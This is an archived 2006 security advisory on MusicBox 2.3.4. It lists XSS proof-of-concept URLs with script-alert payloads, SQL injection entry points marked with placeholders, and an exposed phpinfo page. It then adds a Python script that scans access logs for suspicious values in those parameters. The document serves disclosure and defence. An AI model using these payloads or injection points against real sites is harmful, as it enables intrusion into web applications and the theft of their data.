Information Security


Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  SQuery v.x (devi.php) (armygame.php) Remote File Inclusion

  [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities

  XSS in Devium CMS 1.5

  SQL-Injection in Shop-Script PRO & Shop-Script Premium all version

From: securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com>
Date: July 25, 2006
Subject: MusicBox <= 2.3.4 XSS SQL injection Vulnerability

MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
/phpinfo.php
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists
-------------
SQL injection
-------------
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------
Ellipsis Security
http://www.ellsec.org
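
A log-review check for the query parameters named in this advisory, as an added example that is not part of the original advisory or of MusicBox. Treating `id`, `page`, `show`, `start` and `aid` as integer-only is an assumption inferred from the sample URLs, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory. Treating these as integer-only is an
# assumption based on the sample URLs, not on MusicBox source code.
NUMERIC_PARAMS = {"id", "page", "show", "start", "aid"}
# Parameters named in the advisory that carry text (search term, list type).
TEXT_PARAMS = {"term", "type", "in"}
MARKUP = re.compile(r"[<>\"'`]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return sorted (param, reason) findings for one request target."""
    findings = set()
    query = urlsplit(target).query
    # parse_qsl percent-decodes values, so encoded input is checked too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and value and not re.fullmatch(r"\d+", value):
            findings.add((name, "non-numeric value"))
        elif name in TEXT_PARAMS and MARKUP.search(value):
            findings.add((name, "markup or quote character"))
    return sorted(findings)

def scan_log(lines):
    """Yield (line_number, findings) for access-log lines that look suspicious."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            findings = check_request(match.group(1))
            if findings:
                yield number, findings

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2006:10:00:00 +0000] "GET /index.php?action=top&show=5&type=Artists HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Jul/2006:10:00:05 +0000] "GET /index.php?action=top&show=1%27&type=Artists HTTP/1.1" 200 512',
    '192.0.2.12 - - [25/Jul/2006:10:00:09 +0000] "GET /index.php?term=%3Cb%3Ex&in=song&action=search&start=0 HTTP/1.1" 200 512',
    '192.0.2.13 - - [25/Jul/2006:10:00:12 +0000] "GET /?action=viewgallery&type=album&aid=&page=-1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

Quote characters can appear in legitimate search terms, so hits on `term` are leads for review rather than confirmed attempts.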

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod